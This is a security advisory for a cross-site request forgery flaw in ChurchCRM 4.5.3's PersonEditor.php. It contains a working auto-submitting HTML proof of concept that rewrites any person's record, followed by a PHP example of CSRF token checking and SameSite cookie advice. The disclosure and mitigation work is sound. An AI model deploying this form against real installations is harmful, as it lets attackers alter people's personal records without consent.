CVE-2023-26839 - Cross-Site Request Forgery (CSRF) via PersonEditor.php
| Researchers | 10splayaSec |
| Severity | 6.9 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:H/A:N) |
| Published | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26839 |
| Software Link | https://github.com/ChurchCRM/CRM |
Description
A cross-site request forgery (CSRF) vulnerability in ChurchCRM 4.5.3 allows attackers to edit the information of existing people on the site.
Proof of Concept
- Using the HTML below, we can change the data of any person on the site. This includes first, middle, and last name, email address, state, city, and more.
<html>
<body>
<form method="POST" action="http://<URL>/churchcrm/PersonEditor.php?PersonID=<ID>">
<input type="hidden" name="Gender" value="0"/>
<input type="hidden" name="Title" value=""/>
<input type="hidden" name="FirstName" value="<FIRST NAME>"/>
<input type="hidden" name="MiddleName" value="<MIDDLE NAME>"/>
<input type="hidden" name="LastName" value="<LAST NAME>"/>
<input type="hidden" name="Suffix" value=""/>
<input type="hidden" name="BirthMonth" value="10"/>
<input type="hidden" name="BirthDay" value="12"/>
<input type="hidden" name="BirthYear" value="2022"/>
<input type="hidden" name="FamilyRole" value="0"/>
<input type="hidden" name="Family" value="0"/>
<input type="hidden" name="Address1" value=""/>
<input type="hidden" name="Address2" value=""/>
<input type="hidden" name="City" value=""/>
<input type="hidden" name="State" value=""/>
<input type="hidden" name="StateTextbox" value=""/>
<input type="hidden" name="Zip" value=""/>
<input type="hidden" name="HomePhone" value=""/>
<input type="hidden" name="WorkPhone" value=""/>
<input type="hidden" name="CellPhone" value=""/>
<input type="hidden" name="Email" value=""/>
<input type="hidden" name="WorkEmail" value=""/>
<input type="hidden" name="Facebook" value=""/>
<input type="hidden" name="Twitter" value=""/>
<input type="hidden" name="LinkedIn" value=""/>
<input type="hidden" name="Classification" value="0"/>
<input type="hidden" name="MembershipDate" value=""/>
<input type="hidden" name="FriendDate" value="2023-02-03"/>
<input type="hidden" name="PersonSubmit" value="Save"/>
<input type="submit" value="Submit">
</form>
<script>
document.forms[0].submit()
</script>
</body>
</html>
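
The PoC form above carries no anti-CSRF token, so the server-side check that would reject it is a per-session synchronizer token verified on every state-changing request. The following is an added example, not ChurchCRM's code or its actual fix; the field name `csrf_token` and both function names are assumptions made for illustration, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helper names, not ChurchCRM code.
const CSRF_FIELD = 'csrf_token'; // assumed hidden form field / session key

/** Create (once per session) and return the token to embed in the edit form. */
function csrf_issue_token(array &$session): string
{
    if (empty($session[CSRF_FIELD])) {
        $session[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_FIELD];
}

/** True only if a state-changing request carries the session's token. */
function csrf_request_allowed(array $session, string $method, array $post): bool
{
    if (!in_array($method, ['POST', 'PUT', 'PATCH', 'DELETE'], true)) {
        return true; // GET/HEAD pass through; handlers must not change state on them
    }
    $expected = $session[CSRF_FIELD] ?? '';
    $supplied = $post[CSRF_FIELD] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false; // no token issued, or a missing/array value was submitted
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// --- Constructed sample requests (not captured traffic) ---
$session = [];                        // stands in for $_SESSION
$token   = csrf_issue_token($session);

// Field names taken from the PoC form; like the PoC, it has no token field.
$forged = ['FirstName' => 'X', 'LastName' => 'Y', 'PersonSubmit' => 'Save'];
// The same submission sent from the application's own form, which embeds the token.
$legit  = $forged + [CSRF_FIELD => $token];
// A cross-site page guessing a token value it cannot read.
$guess  = $forged + [CSRF_FIELD => str_repeat('0', 64)];

foreach (['forged' => $forged, 'guess' => $guess, 'legit' => $legit] as $name => $post) {
    $ok = csrf_request_allowed($session, 'POST', $post);
    printf("%-6s -> %s\n", $name, $ok ? 'accepted' : 'rejected (403)');
}
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` is a complementary control, since it stops the browser from attaching the session to a cross-site auto-submitted POST in the first place.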
